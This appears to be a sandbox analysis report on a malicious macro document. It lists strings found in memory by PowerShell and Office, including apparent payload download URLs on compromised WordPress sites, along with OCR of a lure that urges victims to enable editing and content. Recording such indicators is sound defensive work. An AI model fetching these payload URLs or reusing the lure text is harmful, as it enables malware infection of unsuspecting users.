Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: powershell.exe, 00000005.00000003.335952419.000001924A606000.00000004.00000001.sdmpString found in binary or memory: https://certs.godaddy.com/repository/0
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cortana.ai/api
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://cr.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev.cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://devnull.onenote.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://directory.services.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Lato%3A100%2C300%2C400%2C600%2C700%2C900%7COpen
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338722577.00000192326F9000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000005.00000002.340780682.0000019232C21000.00000004.00000001.sdmpString found in binary or memory: https://giatot365.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: https://giatot365.com/wp-content/uploads/2
Source: powershell.exe, 00000005.00000002.340589263.0000019232B6E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: https://giatot365.com/wp-content/uploads/2020/Sx/
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmpString found in binary or memory: https://giatot365.comx
Source: powershell.exe, 00000005.00000002.338304590.0000019232406000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: powershell.exe, 00000005.00000002.341700269.00000192330AC000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://graph.windows.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://graph.windows.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://layerslider.kreaturamedia.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://lifecycle.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://login.windows.local
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://management.azure.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://management.azure.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://messaging.office.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ncus.contentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ncus.pagecontentsync.
Source: powershell.exe, 00000005.00000002.342905639.0000019242254000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://officeapps.live.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://onedrive.live.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://outlook.office.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://outlook.office365.com/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://powerlift.acompli.net
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://settings.outlook.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://staging.cortana.ai
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://tasks.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://webshell.suite.office.com
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://wus2.contentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://wus2.pagecontentsync.
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com//
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/about-us/
Source: powershell.exe, 00000005.00000002.338769822.0000019232712000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/assets/09erZFF/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/blog/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/comments/feed/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/contact/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/feed/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/project/great-project/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/project/luv-summer/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/project/the-beauty/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/project/trending-couple/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/project/world-business/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-admin/admin-ajax.php
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/css/layerslider.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/greensock.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.kreatu
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/LayerSlider/static/layerslider/js/layerslider.transi
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/contact-form-7/includes/css/styles.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/css/rs6.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rbtools.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/plugins/revslider/public/assets/js/rs6.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/animations.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/elegant.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/font-awesome.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/moon.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/rgs.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/css/thefox_js_composer.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/images/404_default.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/images/loader.gif
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/Flexslider/flexslider.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/prettyPhoto/css/prettyPhoto.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/includes/zilla-likes/styles/zilla-likes.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/css3-mediaqueries.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/html5.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/js/scrollmagic.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/media-queries_wide.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/style.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/themes/thefox/style_end.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/big_mob_logo-1.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/favicon.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo-300x115.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/light_logo.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-content/uploads/2021/01/logo_v_low.png
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-includes/css/dist/block-library/style.min.css
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-includes/js/jquery/jquery-migrate.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-includes/js/jquery/jquery.min.js
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/wp-json/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.calltorepair.com/xmlrpc.php?rsd
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/calltorepair/
Source: EBBBFCCB-40A6-407F-8E1B-936E8948873B.0.drString found in binary or memory: https://www.odwebp.svc.ms
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://www.youtube.com/channel/UC9vlmpCi8mAWSIwah-4A6PA/featured
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://xuanthinhshop.com
Source: powershell.exe, 00000005.00000002.339541174.00000192328D0000.00000004.00000001.sdmpString found in binary or memory: https://xuanthinhshop.com/acura-mdx-snck0/2LU7w/
Source: powershell.exe, 00000005.00000002.338976732.0000019232788000.00000004.00000001.sdmpString found in binary or memory: https://xuanthinhshop.comx
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 107.180.2.185:443 -> 192.168.2.5:49723 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. k End of document W Screen
Source: Screenshot number: 8Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8Screenshot OCR: ENABLE CONTENT" buttons to preview this document. k End of document W Screen 1 of 1 O Type here
Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
